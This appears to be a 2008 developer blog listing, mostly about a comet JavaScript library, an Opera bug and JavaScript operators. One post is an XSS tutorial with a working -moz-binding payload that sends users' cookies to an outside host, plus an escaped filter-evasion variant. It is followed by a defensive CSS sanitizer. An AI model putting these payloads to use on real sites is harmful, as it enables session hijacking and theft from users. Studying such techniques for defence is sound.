One step forward two steps back Date: July 10, 2008 Tags: comet , javascript Comments(0)
Newer versions of the Opera browser run functions twice when they are added as listeners to event-source elements. I found this bug when I tested the new version of pi.comet. You can find the source code below:
event-source.html
<body>
  <div id="time"></div>
  <script>
    // Create an <event-source> element that streams events from the server
    var event = document.createElement("event-source");
    event.setAttribute("src","event-source.php");
    document.body.appendChild(event);
    // Newer Opera versions call this listener twice for every "azer" event
    event.addEventListener("azer",function(){
      document.getElementById("time").innerHTML += "<br>"+arguments[0].data;
    },false);
  </script>
</body>
event-source.php
<?php
header("content-type: application/x-dom-event-stream");
while(true){
    // Send one "azer" event carrying the current unix time
    print "Event: azer\n";
    print "data: ".time()."\n\n";
    sleep(3);
    ob_flush();
    flush();
}
?>
How Is a Web-Based Trojan Made? Date: May 11, 2008 Tags: javascript , security , turkce Comments(0)
I decided to talk about a few techniques for XSS and web security enthusiasts. The first of these is the moz-binding method, which works in Firefox, is quite effective, and is very little known. I wrote this post in a "let's hit, let's smash" style, but my only aim is to create a resource for security countermeasures. Last year Hakan (Bilgin) was working on code highlighting for cloudo, and I was doing the same for r(ainbow)92. In an example he prepared back then, Hakan used the XBL/-moz-binding technique to import XML into the application from within CSS code, and ran JavaScript from within the XML. I found this quite interesting, and it was how I got acquainted with -moz-binding.
If you combine this interesting technique with the script include method that led Yahoo UI developer Douglas Crockford to discover JSON (this method allows both data transfer and whatever craziness you want on the client), what you can do is limited only by your imagination. For example, you can pull all the mail of a user who reads mail over the web on hotmail, gmail and so on, or silently have a mail of your choosing written and sent.
To understand how both methods are used, let's build a small example in which we aim to record users' cookies to a victim list; to try the example you can prepare a simple application skeleton or choose a real victim..
Suppose the web application we chose allows users only innocent-looking HTML tags such as <strong>. If this application does not check attributes, our job is easy: we can run JavaScript directly with events such as onload. If it does check them, find out whether the style attribute is allowed. It is allowed in all applications that expect data from WYSIWYG editors.
Our goal is to call the XBL document using -moz-binding inside the style attribute. Before that, let's prepare the XBL document in which we will run JavaScript and upload it somewhere the victims can reach:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
document.body.appendChild(document.createElement("script")).setAttribute("src","http://victim.com/?append="+escape(document.cookie));
</constructor>
</implementation>
</binding>
</bindings>
style='color:red; -moz-binding:url("http://victim.com/xbl.xml#xss");'
There is a very small chance that your victim has blocked the writing of moz-binding or the fetching of cross-domain data. In that case our plan B comes from a snippet published at "the-spanner.co.uk":
/style=\-\mo\z-b\i\nd\in\g:\url(//victim.com\/xbl_log\.xml\#xss)
The rest is up to your JavaScript knowledge. You can open more varied tunnels in the user's interface, change the interface, or perform actions on the user's behalf.
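A defensive counterpart to the two payloads above, as an added example that is not part of the original post: a style-attribute filter that resolves CSS backslash escapes before checking, then keeps only allowlisted properties with simple values. The function names, the allowlist and the value pattern are assumptions chosen for illustration.

```javascript
// Added example: allowlist filter for user-supplied style attributes.
// ALLOWED_PROPS and SAFE_VALUE are illustrative assumptions, not from the post.
const ALLOWED_PROPS = new Set(["color", "background-color", "font-weight",
  "font-style", "text-decoration", "text-align"]);
// Keywords (red, bold), hex colours, or rgb(r,g,b); no url(), no strings.
const SAFE_VALUE =
  /^(?:[a-z-]+|#[0-9a-f]{3,8}|rgb\(\s*\d{1,3}\s*,\s*\d{1,3}\s*,\s*\d{1,3}\s*\))$/i;

// Resolve CSS escapes the way a browser does, so "\m" and "\6d " both become "m".
function decodeCssEscapes(css) {
  return css.replace(/\\([0-9a-f]{1,6})[ \t\r\n\f]?|\\([^\r\n\f])/gi,
    (match, hex, ch) => {
      if (hex === undefined) return ch;
      const cp = parseInt(hex, 16);
      const bad = cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
      return bad ? "\ufffd" : String.fromCodePoint(cp);
    });
}

// Returns the cleaned style string plus the property names that were dropped.
function sanitizeStyle(style) {
  const decoded = decodeCssEscapes(style).replace(/\/\*[\s\S]*?\*\//g, "");
  const kept = [], dropped = [];
  for (const decl of decoded.split(";")) {
    const colon = decl.indexOf(":");
    if (colon < 0) continue;                      // empty or malformed chunk
    const prop = decl.slice(0, colon).trim().toLowerCase();
    const value = decl.slice(colon + 1).trim();
    if (ALLOWED_PROPS.has(prop) && SAFE_VALUE.test(value)) {
      kept.push(prop + ": " + value);
    } else {
      dropped.push(prop);                         // fail closed, keep for logging
    }
  }
  return { style: kept.join("; "), dropped };
}

// Constructed inputs modelled on the two payloads shown in the post.
const plain = 'color:red; -moz-binding:url("http://victim.com/xbl.xml#xss");';
const escaped = "\\-\\mo\\z-b\\i\\nd\\in\\g:\\url(//victim.com\\/xbl_log\\.xml\\#xss)";
console.log(sanitizeStyle(plain));
console.log(sanitizeStyle(escaped));
```

A keyword blocklist that matches the raw attribute text misses the escaped form, which is why the filter decodes first and then rejects everything not on the allowlist.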
PI Comet's stable version released Date: April 9, 2008 Tags: comet , javascript , pi Comments(0)
I fixed the base class and the reported bugs. You can use the pi.comet file or the slightly larger pi library (I'm preparing documentation and a website for this library).
pi.debugger released Date: April 2, 2008 Tags: debugging , javascript Comments(0)
I've developed a cross-browser debugging tool that contains some Firebug features. You can try it here and get more detailed information at the pi project's website: http://pi-js.googlecode.com
Pi.Comet works with Turbogears as well Date: April 2, 2008 Tags: cherrypy , comet , javascript , pi , turbogears Comments(2)
After a CherryPy test, I developed a real-time chat example with pi.comet & Turbogears. Actually, I was going to add this example a long time ago, but I couldn't find any shared hosting available. Data streaming cannot be used at Webfaction, because Webfaction hosts Turbogears with CGI support. If you have no hosting problems, you can use pi.comet and Turbogears in your comet applications. For now, you can download and test it on your localhost. Download Example: turbogears_realtimeChat.tar.gz
Microsoft has decided to use the Gecko engine in IE8! Date: April 1, 2008 Tags: javascript , misc Comments(0)
Strangely, Microsoft has not advanced a single step in JavaScript interpretation from IE6 to the IE8 beta. Even though IE8 has passed the Acid2 test, there is no news of the innovations we are really waiting for, such as W3C constructors and XPath support for HTML. Considering that the IE they released about 6 years ago is in use today and will still be in use a year from now, which it obviously will be.. How can one still think positively, how can one imagine that IE8 will be able to compete with other browsers? Are we going to wait for IE9 to come out, and then for end users to move to IE9 step by step, before we can write proper JavaScript? In this situation there is no difference between thinking scientifically and thinking pessimistically.. Amid these thoughts I had long been hoping that Microsoft would, in a humanist decision, start using the webkit or gecko engine, when today this article landed in my RSS reader: Microsoft will use Gecko layout engine in IE 8
After reading a few lines my heart truly fluttered :) But as you'll remember, today is that damned day, April 1 :)
"in" Operator in Javascript Date: March 23, 2008 Tags: javascript Comments(0)
Javascript 1.5 contains the in operator, which checks only property names. I can't figure out why Javascript returns the exact opposite of what other programming languages return for this operator. Here is an example:
>>> var hello = ["bonjour","hola","saluton","selam"];
>>> "bonjour" in hello
false
>>> 1 in hello
true
Actually, we don't need the in operator to check the values of an Array; we can use the indexOf method to do this easily:
>>> var hello = ["bonjour","hola","saluton","selam"];
>>> hello.indexOf("bonjour")>-1;
true
>>> hello.indexOf("Hallo")>-1;
false
This operator can be used to check object properties too, but there are already many ways to check object properties:
>>> var hello = { "french":"bonjour", "esperanto":"saluton", "turkish":"selam" };
>>> "turkish" in hello
true
>>> "german" in hello
false
>>> Boolean(hello["turkish"]);
true
>>> Boolean(hello["german"]);
false
The question is, how are object values checked?
gmÇeviri Date: March 22, 2008 Tags: greasemonkey , javascript , misc Comments(4)
gmÇeviri is a greasemonkey script I developed to translate English text selected with the mouse cursor into Turkish while browsing web pages. Read the rest of the post for more information.
pi.comet's python module is available Date: March 21, 2008 Tags: cherrypy , comet , django , javascript , pi , python Comments(2)
I coded a Python module to get cross-browser output, and a CherryPy example is available too. You can get these files in the downloads list. You can use this module with any Python web framework, but there are some problems. Firstly, Django doesn't support multi-threading. And there is no shared hosting for CherryPy (Webfaction runs CherryPy with CGI; the sys.stdout.flush function doesn't work on that application). I hope we have more comet-friendly web frameworks in the future.
Creating Comet Applications In 3 Minutes Date: March 16, 2008 Tags: comet , javascript , pi Comments(10)
The first version of my pi library has been released. This version contains a comet class, and you can make comet requests in your applications by using it.
Tutorial: Getting unix time from server (Sample File, Source)
Firstly, create an html file and import pi.js:
<script type="text/javascript" src="pi.js"></script>
Then, send a request to push.php to get unix time from server:
var request = new pi.comet();
request.environment.setUrl("push.php");
request.event.push = function(RESPONSE){
  document.title = "UNIX TIME AT SERVER: "+RESPONSE;
};
request.send();
Finally, create an infinite loop in push.php, import the pi.pushData function into this file, and print the data, which will be updated each time:
<?php
require_once "pi.pushData.php";
// pi.comet passes the transport type and the request name in the query string
$type = $_GET["cometType"];
$name = $_GET["cometName"];
while(true){
    pushData(time(),$type,$name);
    ob_flush();
    flush();
    sleep(1);
}
That's all! You can get more information at pi.comet's wiki page.
Advanced Javascript Date: March 16, 2008 Tags: javascript Comments(3)
Working on it for a few months, I wrote a 14-page document covering little-known techniques. Content index:
- Functions
- Arrays
- Objects
- Advanced OOP
